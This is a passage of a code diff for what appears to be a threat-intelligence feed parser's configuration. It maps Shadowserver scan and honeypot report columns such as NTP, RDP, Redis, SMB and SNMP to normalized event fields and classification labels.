-# https://www.shadowserver.org/what-we-do/network-reporting/caida-ip-spoofer-report/
-# NOTE: The "type" field is included twice with the same values
-# legacy (replaced by event4_ip_spoofer)
-caida = {
+# https://www.shadowserver.org/what-we-do/network-reporting/ntp-version-report/
+scan_ntp = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'ip'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('source.asn', 'asn', convert_int),
-        # ('classification.identifier', 'tag'),  # always 'ip-spoofer' - set in constant_fields
-        ('classification.identifier', 'infection'),
-        ('source.geolocation.cc', 'geo'),
-        ('source.geolocation.region', 'region'),
-        ('source.geolocation.city', 'city'),
-        ('source.reverse_dns', 'hostname', validate_to_none),
-        ('extra.', 'type', validate_to_none),
-        ('extra.', 'naics', convert_int),
-        ('extra.', 'sic', convert_int),
-        ('extra.', 'sector', validate_to_none),
-        # FIXME Is is mappable to some classification.* field? Not included in example data.
-        ('extra.', 'family', validate_to_none),
-        ('source.network', 'network', validate_to_none),
-        (False, 'version', validate_to_none),  # we can ignore the IP version, it's obvious from the address
-        ('extra.', 'routedspoof', validate_to_none),
-        ('extra.', 'session', convert_int),
-        ('extra.', 'nat', convert_bool),
-        ('extra.', 'public_source', validate_to_none),
+        ('extra.', 'clk_wander', convert_float),
+        ('extra.', 'frequency', convert_float),
+        ('extra.', 'jitter', convert_float),
+        ('extra.', 'leap', convert_float),
+        ('extra.', 'offset', convert_float),
+        ('extra.', 'peer', convert_int),
+        ('extra.', 'poll', convert_int),
+        ('extra.', 'precision', convert_int),
+        ('extra.', 'rootdelay', convert_float),
+        ('extra.', 'rootdispersion', convert_float),
+        ('extra.', 'stratum', convert_int),
+        ('extra.', 'tc', convert_int),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'version', validate_to_none),
+        ('extra.', 'clock', validate_to_none),
+        ('extra.', 'error', validate_to_none),
+        ('extra.', 'mintc', validate_to_none),
+        ('extra.', 'noise', validate_to_none),
+        ('extra.', 'phase', validate_to_none),
+        ('extra.', 'processor', validate_to_none),
+        ('extra.', 'refid', validate_to_none),
+        ('extra.', 'reftime', validate_to_none),
+        ('extra.', 'stability', validate_to_none),
+        ('extra.', 'state', validate_to_none),
+        ('extra.', 'system', validate_to_none),
+        ('extra.', 'tai', validate_to_none),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
-        # FIXME Check if the classification is correct
-        'classification.identifier': 'ip-spoofer',
-        'classification.taxonomy': 'fraud',
-        'classification.type': 'masquerade',
-    }
+        'classification.identifier': 'ntp-version',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'ntp',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/accessible-ms-rdpeudp/
-accessible_msrdpeudp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/ntp-monitor-report/
+scan_ntpmonitor = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
         ('source.ip', 'ip', validate_ip),
-        ('source.port', 'port', convert_int)
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
-        ('source.asn', 'asn', convert_int),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'packets', convert_int),
+        ('extra.', 'size', convert_int),
+        ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
         ('source.geolocation.city', 'city'),
-        ('source.reverse_dns', 'hostname'),
-        ('extra.', 'tag'),
-        ('extra.', 'naics', convert_int),
-        ('extra.', 'sic', convert_int),
-        ('extra.', 'sessionid'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
-        'classification.identifier': 'accessible-msrdpeudp',
+        'classification.identifier': 'ntp-monitor',
         'classification.taxonomy': 'vulnerable',
         'classification.type': 'vulnerable-system',
-    }
+        'protocol.application': 'ntp',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/sinkhole-dns-report/
-sinkhole_dns = {
+# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-Portmapper
+scan_portmapper = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
         ('source.ip', 'ip', validate_ip),
-        ('source.port', 'port', convert_int)
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('source.reverse_dns', 'host'),
-        ('source.asn', 'asn', convert_int),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
         ('source.geolocation.cc', 'geo'),
         ('source.geolocation.region', 'region'),
-        ('extra.dns_query_type', 'type'),
-        ('extra.dns_query', 'query'),
-        ('extra.', 'count', convert_int),
-        ('extra.', 'response'),
-        ('extra.', 'tag'),
-        ('extra.', 'sector'),
-        ('extra.', 'naics', convert_int),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'programs', validate_to_none),
+        ('extra.', 'mountd_port', validate_to_none),
+        ('extra.', 'exports', validate_to_none),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
-        'classification.identifier': 'sinkholedns',
-        'classification.taxonomy': 'other',
-        'classification.type': 'other',
-        'protocol.application': 'dns',
-    }
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'portmapper',
+        'classification.identifier': 'open-portmapper',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-amplification-ddos-events-report/
-honeypot_ddos_amp = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-postgresql-server-report/
+scan_postgres = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'src_ip', validate_ip),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
+        ('extra.', 'startup_error_line', convert_int),
+        ('extra.', 'client_ssl', convert_bool),
         ('protocol.transport', 'protocol'),
-        ('source.port', 'src_port', convert_int),
-        ('source.asn', 'src_asn', invalidate_zero),
-        ('source.geolocation.cc', 'src_geo'),
-        ('source.geolocation.region', 'src_region'),
-        ('source.geolocation.city', 'src_city'),
-        ('source.reverse_dns', 'src_hostname'),
-        ('destination.ip', 'dst_ip', validate_ip),
-        ('destination.port', 'dst_port', convert_int),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
-        ('destination.geolocation.region', 'dst_region'),
-        ('destination.geolocation.city', 'dst_city'),
-        ('destination.reverse_dns', 'dst_hostname'),
-        ('malware.name', 'infection'),
-        ('extra.source.naics', 'src_naics', invalidate_zero),
-        ('extra.source.sector', 'src_sector', validate_to_none),
-        ('extra.', 'device_vendor', validate_to_none),
-        ('extra.', 'device_type', validate_to_none),
-        ('extra.', 'device_model', validate_to_none),
-        ('extra.destination.naics', 'dst_naics', invalidate_zero),
-        ('extra.destination.sector', 'dst_sector', invalidate_zero),
-        ('extra.', 'public_source', validate_to_none),
-        ('extra.', 'family', validate_to_none),
+        ('source.reverse_dns', 'hostname'),
         ('extra.', 'tag', validate_to_none),
-        ('extra.', 'application', validate_to_none),
         ('extra.', 'version', validate_to_none),
-        ('extra.', 'event_id', validate_to_none),
-        ('extra.', 'request', validate_to_none),
-        ('extra.', 'count', convert_int),
-        ('extra.', 'bytes', convert_int),
-        ('extra.', 'end_time', convert_date_utc),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+        ('extra.', 'supported_protocols', validate_to_none),
+        ('extra.', 'protocol_error_code', validate_to_none),
+        ('extra.', 'protocol_error_file', validate_to_none),
+        ('extra.', 'protocol_error_line', validate_to_none),
+        ('extra.', 'protocol_error_message', validate_to_none),
+        ('extra.', 'protocol_error_routine', validate_to_none),
+        ('extra.', 'protocol_error_severity', validate_to_none),
+        ('extra.', 'protocol_error_severity_v', validate_to_none),
+        ('extra.', 'startup_error_code', validate_to_none),
+        ('extra.', 'startup_error_file', validate_to_none),
+        ('extra.', 'startup_error_message', validate_to_none),
+        ('extra.', 'startup_error_routine', validate_to_none),
+        ('extra.', 'startup_error_severity', validate_to_none),
+        ('extra.', 'startup_error_severity_v', validate_to_none),
+        ('extra.', 'handshake', validate_to_none),
+        ('extra.', 'cipher_suite', validate_to_none),
+        ('extra.', 'cert_length', convert_int),
+        ('extra.', 'subject_common_name', validate_to_none),
+        ('extra.', 'issuer_common_name', validate_to_none),
+        ('extra.', 'cert_issue_date', validate_to_none),
+        ('extra.', 'cert_expiration_date', validate_to_none),
+        ('extra.', 'sha1_fingerprint', validate_to_none),
+        ('extra.', 'cert_serial_number', validate_to_none),
+        ('extra.', 'ssl_version', convert_int),
+        ('extra.', 'signature_algorithm', validate_to_none),
+        ('extra.', 'key_algorithm', validate_to_none),
+        ('extra.', 'subject_organization_name', validate_to_none),
+        ('extra.', 'subject_organization_unit_name', validate_to_none),
+        ('extra.', 'subject_country', validate_to_none),
+        ('extra.', 'subject_state_or_province_name', validate_to_none),
+        ('extra.', 'subject_locality_name', validate_to_none),
+        ('extra.', 'subject_street_address', validate_to_none),
+        ('extra.', 'subject_postal_code', validate_to_none),
+        ('extra.', 'subject_surname', validate_to_none),
+        ('extra.', 'subject_given_name', validate_to_none),
+        ('extra.', 'subject_email_address', validate_to_none),
+        ('extra.', 'subject_business_category', validate_to_none),
+        ('extra.', 'subject_serial_number', validate_to_none),
+        ('extra.', 'issuer_organization_name', validate_to_none),
+        ('extra.', 'issuer_organization_unit_name', validate_to_none),
+        ('extra.', 'issuer_country', validate_to_none),
+        ('extra.', 'issuer_state_or_province_name', validate_to_none),
+        ('extra.', 'issuer_locality_name', validate_to_none),
+        ('extra.', 'issuer_street_address', validate_to_none),
+        ('extra.', 'issuer_postal_code', validate_to_none),
+        ('extra.', 'issuer_surname', validate_to_none),
+        ('extra.', 'issuer_given_name', validate_to_none),
+        ('extra.', 'issuer_email_address', validate_to_none),
+        ('extra.', 'issuer_business_category', validate_to_none),
+        ('extra.', 'issuer_serial_number', validate_to_none),
+        ('extra.', 'sha256_fingerprint', validate_to_none),
+        ('extra.', 'sha512_fingerprint', validate_to_none),
+        ('extra.', 'md5_fingerprint', validate_to_none),
+        ('extra.', 'cert_valid', convert_bool),
+        ('extra.', 'self_signed', convert_bool),
+        ('extra.', 'cert_expired', convert_bool),
+        ('extra.', 'validation_level', validate_to_none),
+        ('extra.', 'browser_trusted', validate_to_none),
+        ('extra.', 'browser_error', validate_to_none),
+        ('extra.', 'raw_cert', validate_to_none),
+        ('extra.', 'raw_cert_chain', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'availability',
-        'classification.type': 'ddos',
-        'classification.identifier': 'amplification-ddos-victim',
-    }
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
+        'protocol.application': 'postgres',
+        'classification.identifier': 'open-postgres',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-brute-force-events-report/
-honeypot_brute_force = {
+# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-QOTD
+scan_qotd = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'src_ip'),
-        ('source.port', 'src_port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
-        ('source.asn', 'src_asn', invalidate_zero),
-        ('source.geolocation.cc', 'src_geo'),
-        ('source.geolocation.region', 'src_region'),
-        ('source.geolocation.city', 'src_city'),
-        ('source.reverse_dns', 'src_hostname'),
-        ('extra.source.naics', 'src_naics', invalidate_zero),
-        ('extra.source.sector', 'src_sector', validate_to_none),
-        ('extra.', 'device_vendor', validate_to_none),
-        ('extra.', 'device_type', validate_to_none),
-        ('extra.', 'device_model', validate_to_none),
-        ('destination.ip', 'dst_ip', validate_ip),
-        ('destination.port', 'dst_port'),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
-        ('destination.geolocation.region', 'dst_region'),
-        ('destination.geolocation.city', 'dst_city'),
-        ('destination.reverse_dns', 'dst_hostname'),
-        ('extra.destination.naics', 'dst_naics', invalidate_zero),
-        ('extra.destination.sector', 'dst_sector', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
-        ('malware.name', 'infection'),
-        ('extra.', 'family', validate_to_none),
+        ('source.reverse_dns', 'hostname'),
         ('extra.', 'tag', validate_to_none),
-        ('extra.', 'application', validate_to_none),
-        ('extra.', 'version', validate_to_none),
-        ('extra.', 'event_id', validate_to_none),
-        ('classification.identifier', 'service'),
-        ('extra.', 'start_time', validate_to_none),
-        ('extra.', 'end_time', convert_date_utc),
-        ('extra.', 'client_version', validate_to_none),
-        ('destination.account', 'username', validate_to_none),
-        ('extra.', 'password', validate_to_none),
-        ('extra.', 'payload_url', validate_to_none),
-        ('extra.', 'payload_md5', validate_to_none),
+        ('extra.', 'quote', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'sector', validate_to_none),
     ],
     'constant_fields': {
-        'classification.taxonomy': 'intrusion-attempts',
-        'classification.type': 'brute-force',
-    }
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'qotd',
+        'classification.identifier': 'open-qotd',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/ip-spoofer-events-report/
-event4_ip_spoofer = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-quic-report/
+scan_quic = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'src_ip'),
-        ('source.port', 'src_port'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
         ('protocol.transport', 'protocol'),
-        ('source.asn', 'src_asn', invalidate_zero),
-        ('source.geolocation.cc', 'src_geo'),
-        ('source.geolocation.region', 'src_region'),
-        ('source.geolocation.city', 'src_city'),
-        ('source.reverse_dns', 'src_hostname'),
-        ('extra.source.naics', 'src_naics', convert_int),
-        ('extra.source.sector', 'src_sector', validate_to_none),
-        ('extra.', 'device_vendor', validate_to_none),
-        ('extra.', 'device_type', validate_to_none),
-        ('extra.', 'device_model', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
-        ('classification.identifier', 'infection'),
-        ('extra.', 'family', validate_to_none),
+        ('source.reverse_dns', 'hostname'),
         ('extra.', 'tag', validate_to_none),
-        ('extra.', 'application', validate_to_none),
-        ('extra.', 'version', validate_to_none),
-        ('extra.', 'event_id', validate_to_none),
-        ('source.network', 'network', validate_to_none),
-        ('extra.', 'routedspoof', validate_to_none),
-        ('extra.', 'session', convert_int),
-        ('extra.', 'nat', convert_bool),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.', 'version_field_1', validate_to_none),
+        ('extra.', 'version_field_2', validate_to_none),
+        ('extra.', 'version_field_3', validate_to_none),
+        ('extra.', 'version_field_4', validate_to_none),
     ],
     'constant_fields': {
-        # FIXME Check if the classification is correct
-        'classification.identifier': 'ip-spoofer',
-        'classification.taxonomy': 'fraud',
-        'classification.type': 'masquerade',
-    }
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
+        'classification.identifier': 'open-quic',
+    },
 }
 
-# https://www.shadowserver.org/what-we-do/network-reporting/honeypot-darknet-events-report/
-event4_honeypot_darknet = {
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-radmin-report/
+scan_radmin = {
     'required_fields': [
         ('time.source', 'timestamp', add_UTC_to_timestamp),
-        ('source.ip', 'src_ip'),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
     ],
     'optional_fields': [
-        ('source.port', 'src_port'),
-        ('source.asn', 'src_asn', invalidate_zero),
-        ('source.geolocation.cc', 'src_geo'),
-        ('source.geolocation.region', 'src_region'),
-        ('source.geolocation.city', 'src_city'),
-        ('source.reverse_dns', 'src_hostname'),
-        ('extra.source.naics', 'src_naics', convert_int),
-        ('extra.source.sector', 'src_sector', validate_to_none),
-        ('extra.', 'device_vendor', validate_to_none),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+    ],
+    'constant_fields': {
+        'classification.identifier': 'accessible-radmin',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-rdp-report/
+scan_rdp = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('extra.', 'cve20190708_vulnerable', convert_bool),
+        ('extra.', 'bluekeep_vulnerable', convert_bool),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'handshake', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'rdp_protocol', validate_to_none),
+        ('extra.', 'cert_length', convert_int),
+        ('extra.', 'subject_common_name', validate_to_none),
+        ('extra.', 'issuer_common_name', validate_to_none),
+        ('extra.', 'cert_issue_date', validate_to_none),
+        ('extra.', 'cert_expiration_date', validate_to_none),
+        ('extra.', 'sha1_fingerprint', validate_to_none),
+        ('extra.', 'cert_serial_number', validate_to_none),
+        ('extra.', 'ssl_version', convert_int),
+        ('extra.', 'signature_algorithm', validate_to_none),
+        ('extra.', 'key_algorithm', validate_to_none),
+        ('extra.', 'sha256_fingerprint', validate_to_none),
+        ('extra.', 'sha512_fingerprint', validate_to_none),
+        ('extra.', 'md5_fingerprint', validate_to_none),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'tlsv13_support', validate_to_none),
+        ('extra.', 'tlsv13_cipher', validate_to_none),
+        ('extra.', 'jarm', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'rdp',
+        'protocol.transport': 'tcp',
+        'classification.identifier': 'open-rdp',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-ms-rdpeudp/
+scan_rdpeudp = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'sessionid', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.identifier': 'accessible-msrdpeudp',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+    },
+}
+
+# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-Redis
+scan_redis = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('extra.os.name', 'os', validate_to_none),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'version', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'git_sha1', validate_to_none),
+        ('extra.', 'git_dirty_flag', validate_to_none),
+        ('extra.', 'build_id', validate_to_none),
+        ('extra.', 'mode', validate_to_none),
+        ('extra.', 'architecture', validate_to_none),
+        ('extra.', 'multiplexing_api', validate_to_none),
+        ('extra.', 'gcc_version', validate_to_none),
+        ('extra.', 'process_id', validate_to_none),
+        ('extra.', 'run_id', validate_to_none),
+        ('extra.', 'uptime', validate_to_none),
+        ('extra.', 'connected_clients', validate_to_none),
+        ('extra.', 'sector', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'redis',
+        'classification.identifier': 'open-redis',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-rsync-report/
+scan_rsync = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('extra.', 'password', convert_bool),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'module', validate_to_none),
+        ('extra.', 'motd', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.identifier': 'accessible-rsync',
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'rsync',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-smb-report/
+scan_smb = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('extra.', 'smb_implant', convert_bool),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'arch', validate_to_none),
+        ('extra.', 'key', validate_to_none),
+        ('extra.', 'smbv1_support', validate_to_none),
+        ('extra.', 'smb_major_number', validate_to_none),
+        ('extra.', 'smb_minor_number', validate_to_none),
+        ('extra.', 'smb_revision', validate_to_none),
+        ('extra.', 'smb_version_string', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'smb',
+        'protocol.transport': 'tcp',
+        'classification.identifier': 'open-smb',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-smtp-report/
+scan_smtp = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.', 'banner', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'other',
+        'classification.type': 'other',
+        'protocol.application': 'smtp',
+        'classification.identifier': 'open-smtp',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/vulnerable-smtp-report/
+scan_smtp_vulnerable = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'banner', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'smtp',
+        'classification.identifier': 'vulnerable-smtp',
+    },
+}
+
+# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-SNMP
+scan_snmp = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('extra.', 'version', convert_int),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'sysdesc', validate_to_none),
+        ('extra.', 'sysname', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'naics', invalidate_zero),
+        ('extra.', 'sic', invalidate_zero),
+        ('extra.', 'sector', validate_to_none),
+        ('extra.', 'device_vendor', validate_to_none),
         ('extra.', 'device_type', validate_to_none),
         ('extra.', 'device_model', validate_to_none),
-        ('destination.ip', 'dst_ip', validate_ip),
-        ('destination.port', 'dst_port', convert_int),
-        ('destination.asn', 'dst_asn', invalidate_zero),
-        ('destination.geolocation.cc', 'dst_geo'),
-        ('destination.geolocation.region', 'dst_region'),
-        ('destination.geolocation.city', 'dst_city'),
-        ('destination.reverse_dns', 'dst_hostname'),
-        ('extra.destination.naics', 'dst_naics', invalidate_zero),
-        ('extra.destination.sector', 'dst_sector', validate_to_none),
-        ('extra.', 'public_source', validate_to_none),
-        ('malware.name', 'infection'),
-        ('extra.', 'family', validate_to_none),
-        ('classification.identifier', 'tag'),  # different values possible in this report
-        ('extra.', 'application', validate_to_none),
+        ('extra.', 'device_version', validate_to_none),
+        ('extra.', 'device_sector', validate_to_none),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'community', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'protocol.application': 'snmp',
+        'classification.identifier': 'open-snmp',
+    },
+}
+
+# https://www.shadowserver.org/what-we-do/network-reporting/accessible-socks4-5-proxy-report/
+scan_socks = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('protocol.application', 'tag'),
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.source.naics', 'naics', invalidate_zero),
+        ('extra.source.sic', 'sic', invalidate_zero),
+        ('extra.source.sector', 'sector', validate_to_none),
+    ],
+    'constant_fields': {
+        'classification.taxonomy': 'vulnerable',
+        'classification.type': 'vulnerable-system',
+        'classification.identifier': 'open-socks',
+    },
+}
+
+# https://www.shadowserver.org/wiki/pmwiki.php/Services/Open-SSDP
+scan_ssdp = {
+    'required_fields': [
+        ('time.source', 'timestamp', add_UTC_to_timestamp),
+        ('source.ip', 'ip', validate_ip),
+        ('source.port', 'port', convert_int),
+    ],
+    'optional_fields': [
+        ('protocol.transport', 'protocol'),
+        ('source.reverse_dns', 'hostname'),
+        ('extra.', 'tag', validate_to_none),
+        ('extra.', 'header', validate_to_none),
+        ('source.asn', 'asn', invalidate_zero),
+        ('source.geolocation.cc', 'geo'),
+        ('source.geolocation.region', 'region'),
+        ('source.geolocation.city', 'city'),
+        ('extra.', 'systime', validate_to_none),
